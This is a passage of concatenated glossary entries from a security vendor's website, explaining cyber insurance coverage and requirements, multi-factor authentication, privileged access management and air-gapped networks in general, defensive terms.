Breaches: This coverage addresses legal expenses and damages resulting from the unauthorized access, theft, or release of sensitive data. It assists in defending against claims and potential liabilities arising from data breaches. Legal Defense Costs: In the event of a lawsuit or legal action related to a cyber incident, this coverage helps cover the expenses associated with legal defense, including attorney fees, court costs, and settlements. Settlements and Judgments: Should the insured organization be found liable for damages, this coverage provides financial compensation for settlements and judgments resulting from third-party claims. Cyber Insurance Policy Types When it comes to cyber insurance, there are primarily two types of policy options available to individuals and businesses: standalone cyber insurance policies and cyber endorsements to existing insurance policies. Standalone Cyber Insurance Policies Standalone cyber insurance policies are specifically designed to provide comprehensive coverage for cyber risks and incidents. These policies are independent and separate from other insurance policies an organization may have. They typically offer a wide range of coverage options tailored specifically to cyber risks and provide more comprehensive protection. Standalone policies may include both first-party and third-party coverages, as well as additional enhancements and specialized services. By opting for a standalone cyber insurance policy, organizations can obtain dedicated coverage that is specifically designed to address the unique challenges and financial consequences associated with cyber incidents. These policies often offer more flexibility and customization options to meet specific needs. Cyber Endorsements to Existing Insurance Policies Cyber endorsements, also known as cyber liability endorsements or riders, are add-ons or modifications to existing insurance policies. These endorsements expand the coverage of traditional insurance policies to include cyber-related risks and incidents. Commonly, endorsements are added to general liability, property, or professional liability insurance policies. By adding a cyber endorsement to an existing policy, organizations can enhance their coverage and protect against cyber risks without purchasing a separate standalone policy. However, it's important to note that cyber endorsements may offer more limited coverage compared to standalone policies, as they are typically designed to supplement existing coverage rather than provide comprehensive protection for all cyber risks. The decision to choose between standalone cyber insurance policies and cyber endorsements depends on various factors, including the organization's risk profile, budget, existing insurance coverage, and specific needs. It's recommended to consult with insurance professionals and assess the coverage options available to determine the most suitable approach for comprehensive cyber risk management. What are the requirements for cyber insurance? The requirements for cyber insurance can vary depending on the insurance provider, policy type, and the specific needs of the insured organization. However, there are common factors and considerations that may be required or recommended when obtaining cyber insurance. Here are some typical requirements to be aware of: Cybersecurity Controls: Insurance providers often expect organizations to have adequate cybersecurity controls in place. This may include implementing industry best practices such as multi-factor authentication, firewalls, intrusion detection systems, encryption, regular software updates, and employee awareness training. Demonstrating a commitment to strong cybersecurity practices can help secure favorable coverage terms and premiums. Risk Assessment: Insurance providers may require organizations to conduct a thorough risk assessment of their cybersecurity posture. This assessment helps identify vulnerabilities, evaluate potential threats, and determine the level of risk exposure. It may involve analyzing existing security measures, network infrastructure, data handling practices, and incident response capabilities. Incident Response Plan: Organizations are often encouraged to have a well-documented incident response plan. This plan outlines the steps to be taken in the event of a cyber incident, including incident reporting, containment, investigation, and recovery procedures. Insurance providers may review and assess the effectiveness of the incident response plan as part of the underwriting process. Data Security and Privacy Policies: Insurance applications may require organizations to provide details about their data security and privacy policies. This includes information on data protection measures, access controls, data retention policies, and compliance with relevant regulations such as the General Data Protection Regulation (GDPR) or industry-specific requirements. Documentation and Compliance: Insurance providers may require organizations to provide documentation and evidence of their cybersecurity practices and compliance with applicable regulations. This may include records of security audits, penetration testing results, compliance certifications, and any prior incidents and their resolutions. Risk Management and Training Programs: Organizations may be expected to have risk management programs in place to mitigate cyber risks effectively. This includes regular training and awareness programs for employees to promote good cybersecurity practices and reduce human error vulnerabilities. What is the average cost of cyber insurance? The average cost of cyber insurance in the U. S. is approximately $1,485 per year, with variations depending on policy limits and specific risks . Small business customers of Insureon, for instance, pay an average of $145 monthly, although this can vary greatly . It's important to note that despite the rise in ransomware activity, the overall pricing of cyber insurance has decreased by 9% in 2023 . What types of businesses need cyber insurance? Generally, any business that stores private information online or on electronic devices requires cyber insurance . This encompasses a diverse range of business types, from retailers and restaurants to consultants and real estate agents . What industries require cyber insurance? While all industries should incorporate cyber liability into their insurance programs due to the increasing prevalence of cyber threats, certain industries have a particularly high need for such coverage. Industries dealing with significant amounts of sensitive data, such as healthcare, finance, and retail, would be particularly in need of cyber insurance . Cyber Insurance Claims Process In the face of a cyber incident, having cyber insurance coverage can provide much-needed support. Understanding the cyber insurance claims process is crucial for organizations to effectively navigate the complexities of filing a claim and receiving the necessary financial assistance. Filing a Cyber Insurance Claim: Incident Identification and Notification: Report the incident to your insurer promptly, following their procedures. Initial Communication and Documentation: Provide essential details about the incident and any immediate actions taken. Documentation and Evidence: Gather supporting evidence such as incident reports, breach notifications, financial records, and legal correspondence. Claim Submission: Submit a comprehensive claim form with accurate details of financial losses and expenses incurred. Understanding Cyber Risks Cyber risks refer to potential harm or damage resulting from malicious activities in the digital realm. These risks encompass a wide range of threats, including data breaches, ransomware attacks, phishing attempts, malware infections, and more. The impact of cyber risks can be devastating, affecting individuals, businesses, and even national security. Cyber attacks can lead to financial losses, reputational damage, intellectual property theft, privacy breaches, and disruptions to critical infrastructures. Examples of Cyber Threats To comprehend the gravity of cyber risks, it is crucial to examine real-world examples of prevalent cyber threats. Data breaches, where unauthorized parties gain access to sensitive information, are a significant concern. Recent incidents, such as the Equifax data breach or the Marriott International security breach, exposed millions of individuals' personal data and highlighted the far-reaching consequences of such attacks. Ransomware attacks, another pervasive threat, involve encrypting systems and demanding a ransom for their release. Notable cases include the WannaCry and NotPetya attacks, which wreaked havoc on organizations worldwide. What is the scope of the Cyber Insurance threat and its financial consequences? A report by IBM Security and the Ponemon Institute estimated the average cost of a data breach to be $3. 86 million in 2020. This includes expenses related to incident response, investigation, recovery, regulatory fines, legal actions, customer notification, and reputational damage. As the rate of ransomware attacks soars – up 71% in the past year and fueled by billions of stolen credentials available on the dark web – threat actors increasingly make use of lateral movement to successfully spread payloads across an entire environment at once. Major companies, including Apple, Accenture, Nvidia, Uber, Toyota, and Colonial Pipeline, have all been victims of recent high-profile attacks resulting from blind spots in identity protection. This is why underwriters have put stringent measures in place that companies must meet before being eligible for a policy. Is multi-factor authentication (MFA) a requirement for cyber insurance? The requirement for multi-factor authentication (MFA) in cyber insurance policies can vary depending on the insurance provider and the specific policy terms. That being said, many insurance providers strongly recommend or encourage the implementation of MFA as part of cybersecurity compliance measures. MFA adds an extra layer of protection by requiring users to provide multiple forms of verification, such as a password and a unique code sent to a mobile device, to access systems or sensitive information. By implementing MFA, organizations can significantly reduce the risk of unauthorized access and protect against credential-based attacks. How do cyber insurers’ requirements for MFA reduce ransomware risk? In the context of ransomware attacks, MFA can help mitigate the risk in several ways: Stronger authentication: Ransomware attacks often succeed due to compromised credentials. Attackers gain access to a system or network by using stolen or weak passwords. By enforcing MFA, even if an attacker manages to obtain or guess a password, they would still need the additional factor (e. g. , a physical device or biometric data) to gain access. This additional layer of authentication makes it much harder for attackers to proceed with lateral movement. Preventing unauthorized access: With MFA, even if an attacker gains... --- - Published: 2023-01-25 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/multi-factor-authentication-mfa/ A security measure requiring two or more distinct forms of identity verification—such as a password plus a token or biometric—for user authentication. Multi-Factor Authentication (MFA) is a security mechanism that provides an additional layer of protection beyond traditional username-password authentication. It requires users to provide multiple forms of identification or evidence to verify their identity before granting access to a system, device, or application. MFA is designed to address the limitations and vulnerabilities associated with single-factor authentication, where a username and password combination is the only requirement for access. By incorporating multiple authentication factors, MFA significantly enhances security and reduces the risk of unauthorized access, data breaches, and identity theft. Why MFA is important: The need for enhanced security measures The need for MFA arises from the fact that credentials alone no longer suffice as a trusted identifier of legitimate users. In recent years we’ve witnessed a sharp increase in the volume of attacks that use compromised user credentials to access target resources. According to Microsoft, MFA is 99. 9% effective in preventing such identity-based attacks. This is because even if a user’s credentials get compromised, MFA makes it incredibly difficult for attackers to pass the authentication requirements. Understanding Authentication In the digital age, authentication is a critical process that verifies the identity of users and ensures the security of sensitive information. It serves as a gatekeeper, granting access only to authorized individuals. There are two primary authentication methods: Single-Factor Authentication (SFA) and Multi-Factor Authentication (MFA). Single-Factor Authentication Single-Factor Authentication relies on a single method of verifying identity. It typically involves the use of a username and password combination. Users provide their credentials, and if they match the stored information, access is granted. Examples of SFA include logging into an email account or accessing a social media profile. However, SFA has inherent limitations and vulnerabilities. Passwords can be weak, easily guessable, or susceptible to brute-force attacks. Users often reuse passwords across multiple accounts, amplifying the risks. Additionally, passwords can be stolen through phishing attacks or keyloggers. Once an attacker gains access to the password, they can impersonate the user and potentially cause significant harm. Multi-Factor Authentication (MFA) To address the weaknesses of SFA, Multi-Factor Authentication (MFA) was introduced. MFA requires users to provide multiple forms of identification or evidence to verify their identity. It adds an extra layer of security beyond the traditional username-password combination by combining two or more authentication factors. These factors fall into different categories: knowledge, possession, inherence, and location. By requiring multiple factors, MFA significantly enhances security and makes it more challenging for attackers to gain unauthorized access. MFA greatly improves security by reducing the risks associated with stolen passwords and credential theft. Even if an attacker manages to obtain a user's password, they would still need to bypass additional factors to authenticate successfully. This multi-layered approach significantly mitigates the chances of unauthorized access, protecting sensitive data and resources. What's the difference between MFA and Two-Factor Authentication (2FA)? Two-Factor Authentication (2FA) is a specific type of Multi-Factor Authentication (MFA). While both aim to enhance security beyond username-password authentication, there is a slight difference between them. 2FA requires users to provide two distinct factors to verify their identity. Typically, this involves combining something the user knows (password) with something they possess (physical token or OTP on a mobile device). MFA, on the other hand, is a broader term that includes the use of more than two factors. In addition to knowledge and possession factors, MFA can incorporate factors like biometrics (fingerprint, facial recognition) or location-based verification. In essence, 2FA is a subset of MFA, with MFA offering the flexibility to include multiple factors beyond the two commonly used ones. How does MFA work? Multi-factor Authentication (MFA) works by requiring users to provide multiple forms of identification or evidence to verify their identity. It's important to note that the specific steps and factors involved in MFA can vary depending on the system or service being used but here's a concise overview of how MFA typically works: User Initiation: The user initiates the authentication process by providing their username or identifier. First Factor: The first factor, often a knowledge factor, is requested. This can be a password, PIN, or answers to security questions. The user enters the required information. Verification: The system verifies the first factor by comparing the provided information with the stored credentials associated with the user's account. Second Factor: After successful verification of the first factor, the system prompts the user to provide the second factor. This can be a possession factor, such as a one-time password (OTP) generated by a mobile app or a physical token, or an inherence factor like a fingerprint or facial scan. Verification and Authentication: The system verifies the second factor by validating the OTP, scanning the biometric data (with a fingerprint scan or retinal scan), or confirming possession of the physical token. If the second factor is successfully verified, the user's identity is authenticated, and access is granted to the desired system, device, or application. Optional Additional Factors: Depending on the implementation, MFA may include additional factors, such as a location factor where the system verifies the user's IP address or geolocation, or behavioral factors that analyze user patterns and context for further validation. What are the factors of authentication in MFA? Multi-Factor Authentication (MFA) is a powerful security measure that combines multiple factors to verify user identity. These factors fall into different categories, each providing a unique layer of protection. These factors include: A. Knowledge Factor (Something You Know) The knowledge factor involves something the user knows, such as passwords, personal identification numbers (PINs) or security questions. Passwords have long been used as the primary form of authentication. However, they come with their own set of challenges and vulnerabilities. Weak passwords, password reuse, and easily guessable combinations pose significant risks. It is essential to follow password best practices, such as using strong and unique passwords, regularly updating them, and avoiding common words or patterns. Educating users about the importance of password security is crucial to mitigate vulnerabilities associated with the knowledge factor. B. Possession Factor (Something You Have) The possession factor relies on something the user possesses. This can include physical tokens, smart cards, email or SMS verification codes, or mobile authentication apps. Physical tokens are small devices that generate one-time passwords (OTPs) or digital signatures, adding an extra layer of security. Smart cards, on the other hand, store authentication credentials securely. A mobile authenticator app leverages the ubiquity of smartphones, turning them into authentication devices. These apps generate time-based OTPs or use push notifications to verify user identity. The possession factor ensures that only individuals with the authorized physical or digital possession can authenticate successfully. C. Inherence Factor (Something You Are) The inherence factor is based on unique biological or behavioral traits of individuals. Biometric factors, such as fingerprints, facial recognition, voice recognition, or iris scanning, fall under this category. Biometrics offer advantages in terms of convenience, as users don't need to remember passwords or carry physical tokens. They provide a highly personalized and secure method of authentication. However, biometrics also have limitations. Biometric data can be subject to false positives or false negatives, and it can raise privacy concerns. The implementation of biometric authentication should address these considerations to ensure effectiveness and user acceptance. D. Location Factor (Somewhere You Are) The location factor takes into account the user's physical location or context. Geo-location and IP address verification are commonly used to validate user identity. By checking the user's location against authorized regions, suspicious activities from unfamiliar locations can be flagged. IP address verification adds an additional layer of security by matching the user's IP address against known trusted IP ranges. Contextual authentication is another approach where factors such as time of login, device type, or user behavior patterns are considered to assess the legitimacy of the authentication request. These location-based factors provide added assurance and protection against unauthorized access. Benefits and Challenges of Multi-Factor Authentication Multi-Factor Authentication (MFA) offers numerous benefits but also comes with its own set of challenges. Benefits of MFA Increased security: MFA significantly enhances security by adding an extra layer of protection beyond passwords. It reduces the risk of unauthorized access and strengthens defense against various attacks. Mitigation of password-related risks: MFA reduces reliance on passwords, which are susceptible to weaknesses like weak passwords, password reuse, and phishing attacks. By incorporating additional factors, MFA mitigates the risks associated with password-related vulnerabilities. Compliance with industry regulations: MFA helps organizations meet regulatory requirements and industry standards related to data protection and security. Implementing MFA ensures compliance with guidelines and regulations set by regulatory bodies. Challenges of MFA User adoption and resistance: MFA can face resistance from users who find it inconvenient or unfamiliar. Some users may resist the additional steps or find the learning curve challenging. Proper education and user awareness programs can help address these challenges. Potential usability issues: MFA implementations may introduce usability issues, particularly if not designed with a user-friendly approach. Complicated processes or technical difficulties can frustrate users and hinder adoption. User experience should be carefully considered to minimize usability challenges. Cost considerations: Implementing MFA may involve initial investment and ongoing costs. Organizations must consider factors such as the cost of hardware tokens, software licenses, or maintenance and support. Cost-effectiveness and the long-term benefits should be evaluated. Can Multi Factor Authentication be hacked? While Multi-Factor Authentication (MFA) significantly enhances security, it is not entirely immune to hacking or exploitation. Although MFA adds additional layers of protection, determined attackers may still find ways to compromise it through various methods. Here are a few considerations regarding the potential hacking of MFA: Social Engineering: Attackers may attempt to deceive or manipulate users to disclose their authentication factors, such as tricking them into revealing their passwords or providing access to their physical tokens or mobile devices. Social engineering attacks exploit human vulnerabilities rather than directly targeting the MFA system itself. Phishing Attacks: Phishing attacks aim to trick users into visiting fake websites or clicking on malicious links to collect their authentication credentials. Even with MFA in place, if users unknowingly provide their factors to fraudulent websites, attackers can still gain access to their accounts. Malware and Keyloggers: Malicious software or keyloggers can capture keystrokes or screen activity, potentially capturing passwords or one-time codes generated by MFA devices or applications. This information can be used by attackers to bypass MFA. SIM Swapping: In cases where MFA relies on text messages or voice calls for delivering authentication codes, attackers can attempt to fraudulently transfer a victim's phone number to a device under their control. This allows them to intercept authentication codes sent via SMS or voice calls. Biometric Spoofing: Biometric factors, such as fingerprints or facial recognition, can be susceptible to spoofing attacks using advanced techniques like synthetic fingerprints or 3D models of faces. These attacks can potentially bypass biometric-based MFA systems. While the above methods pose potential risks, implementing MFA still significantly improves security and makes it much more challenging for attackers to compromise accounts compared to single-factor authentication. MFA remains an effective security measure and is widely recommended as a best practice to protect against unauthorized access. To mitigate the risk of MFA hacking, it is crucial to stay vigilant, educate users about potential threats, and adopt additional security measures such as regular software updates, robust anti-malware solutions, and user awareness training on phishing and social engineering attacks. Organizations should also continuously monitor and enhance their MFA systems to stay ahead of evolving threats. Implementing Multi-Factor Authentication Multi-Factor Authentication (MFA) is a powerful security measure that enhances protection against unauthorized access. When implementing MFA, several considerations need to be taken into account, including user experience, compatibility, scalability, and maintenance. Additionally, there are various types of MFA solutions available. Let's explore these aspects in detail: Considerations for MFA Implementation User Experience and Convenience: One of the key considerations when implementing MFA is ensuring a positive user experience. MFA should strike a balance between security and usability to encourage user adoption. The authentication process should be intuitive, streamlined, and not overly burdensome for users. Ensuring convenience through factors like... --- - Published: 2023-01-25 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/privileged-access-management-pam/ Technologies and policies that manage and monitor elevated-level user access (e.g., administrators), enforcing strict controls and reducing security risk. Privileged Access Management (PAM) consists of a set of strategies, technologies, and processes designed to control and manage privileged access to an organization's networks, systems, and data. The role of Privileged Access Management (PAM) in protecting organizations against unauthorized access and security breaches is crucial.   Typically, privileged access refers to the elevated level of privileges granted to certain users or accounts within an IT infrastructure. Privileged accounts have extensive control over critical resources and are capable of performing tasks that are not available to regular user accounts. To prevent unauthorized individuals from exploiting these powerful privileges and compromising an organization's security, privileged access must be managed and secured. What Are Privileges and How Are They Created? In the context of cybersecurity, privileges refer to the specific permissions assigned to users or accounts within an IT system. These privileges determine the actions and operations that a user or account can perform within a network, application, or system. Privileges are created and assigned based on the principle of least privilege (PoLP), which advocates granting users or accounts only the minimum privileges necessary to carry out their designated tasks. This principle helps limit potential security risks by reducing the attack surface and minimizing the potential impact of compromised accounts by limiting the number of users with administrative access. Privileges can be categorized into different levels, such as: User-level privileges: These privileges are associated with regular user accounts and generally include basic permissions required for day-to-day tasks. User-level privileges allow users to access files, execute applications, and perform routine operations. Administrative privileges: Also known as superuser or administrator privileges, these are higher-level permissions granted to individuals responsible for managing systems, networks, and applications. Admin privileges enable users to configure settings, install software, modify system configurations, and perform other critical tasks necessary for system administration. The creation and assignment of privileges typically involve the role-based access control (RBAC) approach. RBAC allows administrators to define roles and associate sets of privileges with each role. Users or accounts are then assigned specific roles based on their responsibilities within the organization. This centralized approach streamlines privilege management and ensures consistent access control across the IT infrastructure. It is important to regularly review and update privileges to align with organizational needs and security requirements. Properly managing privileges is a fundamental aspect of maintaining a robust security posture and preventing unauthorized access and misuse of critical resources.   What are Privileged Accounts? Privileged accounts, also referred to as administrative accounts or privileged users, are user accounts with elevated privileges beyond those of regular user accounts. These accounts are typically reserved for system administrators, IT personnel, or other individuals who require extensive control over IT resources. Privileged accounts have broad access rights and permissions that enable them to perform critical actions within an IT infrastructure. They possess the authority to configure system settings, install software, access sensitive data, and perform other administrative tasks necessary for managing and maintaining the organization's IT environment. However, the extensive privileges associated with privileged accounts also make them attractive targets for cybercriminals. If compromised, these accounts can provide attackers with unrestricted access to sensitive data, systems, and network resources, leading to severe security breaches and potential damage. To mitigate the risks associated with privileged accounts, organizations need to implement robust security measures, such as privileged access management (PAM) solutions. PAM solutions facilitate the secure management and monitoring of privileged accounts, ensuring that access is granted on a need-to-know basis and that all activities are logged and audited. Effective management of privileged accounts involves practices such as: Access control: Implementing strict controls to restrict and monitor access to privileged accounts. This includes the use of strong passwords, multi-factor authentication, and session management. Privilege elevation: Utilizing techniques to grant temporary elevated privileges to regular user accounts only when necessary, reducing the exposure of privileged credentials. Privilege separation: Separating administrative tasks and segregating duties to minimize the risk of abuse or unauthorized access. This involves assigning different privileges to different roles and individuals, preventing a single point of compromise. What are Privileged Credentials? Privileged credentials refer to the authentication credentials associated with privileged accounts, allowing users to prove their identity and gain access to elevated privileges. These credentials typically include usernames, passwords, and, in some cases, additional factors like security tokens or biometric data. The security of privileged credentials is of paramount importance in maintaining a secure IT environment. If unauthorized individuals obtain these credentials, they can impersonate privileged users and gain unrestricted access to critical systems and sensitive data. To protect privileged credentials, organizations should adopt strong security measures, such as: Password management: Implementing secure password policies, including the use of complex passwords, regular password rotation, and avoiding password reuse. Additionally, organizations can enhance password security through the use of password vaults and password management solutions. Multi-factor authentication(MFA): Enforcing the use of multiple factors to authenticate privileged users, such as combining passwords with biometric verification, security tokens, or one-time passcodes. MFA adds an extra layer of security, making it significantly harder for unauthorized individuals to gain access to privileged accounts. Credential vaulting: Storing privileged credentials in secure and encrypted vaults, protecting them from unauthorized access and ensuring that they are only accessible to authorized personnel. Privileged session monitoring: Implementing real-time monitoring of privileged sessions to detect any suspicious activities or potential security breaches. This helps in identifying unauthorized access attempts or abnormal behavior by privileged users. How do you identify privileged users? Identifying privileged users is an important step in managing and securing privileged access. Some methods to identify privileged users include: Role-based identification: Privileged users can be identified based on their role in the organization, such as system administrators, IT personnel, database administrators, and others who require elevated privileges to perform their job duties. Permission-based identification: Users who have access to systems, applications, or information that require elevated privileges can be considered privileged users. This information can be obtained from access control lists or other access management systems. Activity-based identification: User activity can be monitored and analyzed to identify users who regularly perform actions that require elevated privileges. For example, if a user frequently accesses sensitive information or makes changes to system configurations, they may be considered a privileged user. Risk-based identification: Users who pose a high risk to an organization’s systems and information can be identified through a risk assessment. For example, users who have access to critical systems or sensitive information, or those who have a history of security incidents, may be considered privileged users. Privileged Access Management vs Privileged Identity Management PAM focuses on managing and controlling privileged access to systems, networks, and resources within an organization's IT infrastructure. It aims to ensure that privileged accounts, which have elevated permissions and access rights, are properly secured, monitored, and audited. PIM, on the other hand, is a subset of PAM that specifically focuses on managing and securing privileged identities. It deals with the lifecycle management of privileged accounts, including their creation, provisioning, deprovisioning, and entitlements. Why PAM is Important Privileged Access Management is important because it helps organizations protect against insider threats, mitigate external attacks, comply with regulatory requirements, minimize the attack surface, enhance visibility and accountability, and safeguard critical assets. By implementing effective PAM strategies, organizations can strengthen their overall security posture and mitigate the risks associated with privileged access, ultimately ensuring the confidentiality, integrity, and availability of their systems and data. Protection against insider threats: Insider threats can pose a significant risk to organizations. Privileged accounts, if compromised or misused by insiders, can result in severe damage, data breaches, or unauthorized modifications. PAM solutions provide granular control and monitoring capabilities, ensuring that privileged access is limited to authorized personnel and any suspicious activities are promptly detected and addressed. Mitigation of external attacks: Cybercriminals are constantly evolving their tactics to gain unauthorized access to sensitive systems and data. Privileged accounts are attractive targets for hackers, as compromising them can provide unrestricted access and control. PAM helps safeguard against external attacks by implementing strong access controls, multi-factor authentication, and continuous monitoring, making it significantly harder for attackers to exploit privileged accounts. Compliance and regulatory requirements: Many industries are subject to stringent regulatory requirements, such as the Payment Card Industry Data Security Standard (PCI DSS), Health Insurance Portability and Accountability Act (HIPAA), or General Data Protection Regulation (GDPR). These regulations often mandate the implementation of controls over privileged access to protect sensitive data. PAM solutions help organizations meet these compliance requirements by enforcing access controls, maintaining audit trails, and demonstrating accountability. Minimization of the attack surface: Privileged accounts often have broad access rights, providing a potential entry point for attackers. By implementing PAM, organizations can enforce the principle of least privilege, ensuring that users or accounts only have the necessary privileges to perform their specific tasks. This reduces the attack surface, limiting the potential impact of compromised accounts and minimizing the overall risk to the organization. Enhanced visibility and accountability: PAM solutions offer comprehensive visibility into privileged account activities, including user sessions, commands executed, and changes made. This visibility enables organizations to monitor and audit privileged access, identifying any suspicious behavior, policy violations, or potential security incidents. Additionally, PAM helps establish accountability by attributing actions to specific privileged users, facilitating forensic investigations and incident response. Safeguarding critical assets and intellectual property: Privileged accounts often have access to an organization's most critical assets, such as intellectual property, financial data, or sensitive customer information. Unauthorized access or misuse of these accounts can lead to significant financial losses, reputational damage, and legal consequences. PAM solutions protect these valuable assets by tightly controlling and monitoring privileged access, ensuring that only authorized individuals can interact with sensitive resources. Benefits of Privileged Access Management Privileged Access Management (PAM) offers several benefits, including enhanced security through access controls and monitoring, improved compliance with industry regulations, reduced insider threats by implementing strict controls and accountability measures, and streamlined operations through automation and centralized management. Enhanced Security: Implementing PAM solutions significantly enhances security by providing robust controls and measures to protect privileged accounts. PAM helps enforce the principle of least privilege, ensuring that users have only the necessary access rights. It includes features such as strong authentication, multi-factor authentication, session monitoring, and access segregation to prevent unauthorized access and detect suspicious activities. By implementing PAM, organizations can effectively mitigate the risks associated with compromised privileged accounts and unauthorized access attempts, thereby strengthening their overall security posture. Improved Compliance: Compliance with industry regulations and standards is a critical requirement for organizations in various sectors. PAM solutions help meet these compliance obligations by enforcing access controls, maintaining audit trails, and demonstrating accountability. By implementing PAM, organizations can demonstrate the necessary controls and measures in place to protect sensitive data, thereby meeting the requirements of regulations such as PCI DSS, HIPAA, GDPR, and others. Compliance with these standards not only avoids penalties but also instills confidence in customers and business partners. Reduction of Insider Threats: Insider threats, which can come from employees, contractors, or business partners, pose a significant risk to organizations. PAM solutions mitigate these risks by implementing strict controls, monitoring, and accountability measures for privileged accounts. By limiting privileges to only those necessary for job functions and implementing session monitoring, organizations can detect and prevent unauthorized or malicious activities by insiders. PAM solutions provide a comprehensive view of privileged account activities, enabling quick detection of any suspicious behavior or policy violations, thereby reducing the potential impact of insider threats. Streamlined Operations: While PAM primarily focuses on security, it can also have positive effects on operational efficiency. By implementing PAM solutions, organizations can streamline operations by automating and centralizing privileged account management processes. This includes features like password management, access request workflows, and session recording. These streamlined processes reduce manual overhead, enhance productivity, and improve operational efficiency for IT teams. Additionally, PAM solutions provide self-service capabilities, enabling authorized users to request and obtain temporary privileged access when needed, reducing administrative burdens. The Drawbacks of PAM PAM solutions are based on placing additional protection on your privileged... --- - Published: 2023-01-18 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/an-air-gapped-network/ A highly secure, physically isolated network with no external connectivity, used to safeguard highly sensitive systems in sectors like defense and critical infrastructure. Air-gapped networks are internal networks completely isolated from the cloud or other external networks. In most cases, this is due to physical security concerns or a strong need for data confidentiality. Some common examples of air-gapped networks include various national security actors such as defense, governments, and military bodies, as well as critical infrastructure entities that provide energy, water utilities, and other enabling services. A network that is air-gapped represents the pinnacle of cybersecurity security. In order to protect themselves against cyber threats, these networks are physically isolated from external connections. The concept of an air-gapped network involves keeping sensitive systems or data completely disconnected from the internet or any other network, ensuring an unparalleled level of protection. Importance of air-gapped networks in cybersecurity The importance of air-gapped networks in cybersecurity cannot be overstated. They serve as a last line of defense against sophisticated attacks, preventing unauthorized access, data exfiltration, and remote exploitation of critical assets. By eliminating connectivity, air-gapped networks reduce the attack surface, making it extremely difficult for malicious actors to penetrate the system. Many industries utilize air-gapped networks to secure their data and resources. Including sectors such as government, defense, finance, healthcare, and critical infrastructure, safeguarding classified data, intellectual property, and sensitive operations. Providing an additional layer of protection to highly valuable assets could have serious consequences if they were compromised. What is an Air-Gap? An air-gap is a complete separation between a network or computer and any external connections, including the public internet. As a result of this isolation, assets are protected from malicious cyber activities. Air-gapped networks originated from the realization that no matter how robust an online security system might be, there will always be security gaps that can be exploited. By physically isolating critical systems, air-gapping provides an additional layer of defense against potential attacks. The concept of air-gapping dates back to the earliest days of computing, when systems were standalone and not interconnected. In recent years, however, it has gained prominence as a security measure due to the rise of cyber threats and the realization that no online security system can provide total protection. As a result of the need to protect sensitive information and critical infrastructure from increasingly sophisticated attacks, air-gapped computers and networks have been widely adopted. Key principles behind air-gapped networks Physical isolation Air-gapped networks are based on the principle of physical isolation. In order to minimize the risk of unauthorized access, critical systems should be physically separated from external networks. A number of methods can be used to achieve this isolation, including physical separation, secure facilities, and limiting physical access to the systems. Restricted connectivity Air-gapped networks impose strict security controls on network connectivity to minimize the number of potential attack vectors. These controls limit the number of entry points and restrict network access to only authorized individuals or systems. By reducing the amount of connectivity, the attack surface is significantly reduced, making it harder for malicious actors to compromise the network. . Unidirectional data flow The principle of unidirectional data flow is a critical component of air-gapped networks. As a result, data can only flow in one direction, typically from a trusted network to the air-gapped system. By doing so, data exfiltration or unauthorized communication from the isolated network is prevented. Techniques such as data diodes, which allow data to flow in one direction only, are commonly employed to enforce unidirectional data transfer. Who uses air-gapped networks? Air-gapped networks are typically utilized by various organizations and industries that prioritize the security and protection of their sensitive information. Here are some examples of entities that commonly use air-gapped networks: Government and Defense Agencies: Government agencies, intelligence organizations, and military institutions often rely on air-gapped networks to safeguard classified information, state secrets, and sensitive defense systems. These networks ensure that critical data remains isolated and inaccessible to unauthorized individuals or foreign adversaries. Financial Institutions: Banks, financial organizations, and stock exchanges employ air-gapped networks to protect sensitive financial data, transactional systems, and customer information. These networks prevent unauthorized access, data breaches, and fraudulent activities, maintaining the integrity and confidentiality of financial computer systems. Healthcare Industry: Hospitals, medical research facilities, and healthcare organizations utilize air-gapped networks to secure medical equipment, patient records, medical research data, and other sensitive healthcare information. These networks ensure compliance with privacy regulations such as the Health Insurance Portability and Accountability Act (HIPAA) and protect against unauthorized access or tampering with sensitive medical data. Energy and Utility Sector: Critical infrastructure, including power plants, water treatment facilities, nuclear power plants, and transportation systems, often rely on air-gapped networks to secure their industrial control systems and operational data. By keeping these networks physically isolated, potential threats are mitigated, preventing unauthorized access and potential disruptions to essential services. Research and Development Institutions: Organizations involved in advanced research and development, such as aerospace, defense contractors, and scientific institutions, utilize air-gapped networks to protect intellectual property, confidential research data, and proprietary information. These networks prevent industrial espionage and safeguard valuable innovations. Legal and Law Enforcement Agencies: Legal firms, law enforcement agencies, and court systems employ air-gapped networks to protect sensitive case files, confidential client information, and classified legal documents. By isolating these networks, unauthorized access and tampering of crucial legal data are mitigated. High-Security Facilities: Highly secure environments such as data centers, server farms, and top-secret research facilities utilize air-gapped networks to create robust security perimeters. These networks ensure that critical infrastructure, data repositories, and communication systems remain impervious to external threats. What are the advantages of air-gapped networks? Air-gapped networks offer several advantages that make them an attractive security measure for organizations, such as: Enhanced Security: The primary advantage of air-gapped networks is their superior security. By physically isolating critical systems and data from external networks, they provide an additional layer of security against cyber threats. With no direct or indirect connectivity, it becomes exceedingly difficult for attackers to breach the network or compromise sensitive information. Protection against Targeted Attacks: Air-gapped networks are especially effective in protecting against targeted attacks, where adversaries meticulously plan and execute sophisticated intrusion techniques. Since these networks are not directly accessible from the internet, they significantly reduce the attack surface and thwart attempts to exploit security gaps in network infrastructure or software. Safeguarding Sensitive Information: Air-gapped networks are crucial for safeguarding sensitive and confidential information. They are widely used in industries such as government, defense, finance, and healthcare, where the integrity and confidentiality of data are paramount. By keeping critical data physically isolated, air-gapped networks prevent unauthorized access and maintain the privacy of sensitive information. Limiting Spread of Malware: Air-gapped networks act as a barrier against the spread of malware and other malicious software. Without direct connectivity, it becomes challenging for malware to propagate from external sources to the isolated network. This helps prevent widespread infections and reduces the risk of data loss or system compromise from ransomware. Reducing Vulnerabilities: By removing external connectivity, air-gapped networks reduce the potential attack vectors and vulnerabilities that can be exploited by cybercriminals. Since there are no direct network interfaces, components, or software exposed to external threats, the risk of system compromise or unauthorized access is significantly diminished. Regulatory Compliance: Air-gapped networks often play a crucial role in meeting regulatory requirements for data protection, privacy, and cyber insurance. Industries such as finance and healthcare have stringent regulations in place, and utilizing air-gapped networks helps organizations comply with these standards and demonstrate their commitment to safeguarding sensitive information. Physical Security: Air-gapped networks rely on physical security measures to maintain the integrity of the network. This includes secure facilities, controlled access to equipment, and surveillance systems. By ensuring that only authorized personnel have physical access to the network, the risk of physical tampering or unauthorized modifications is minimized. What are the downsides of air-gapped networks? While air-gapped networks offer robust security advantages, they also come with some downsides and challenges, so it is important for organizations to carefully evaluate the benefits and 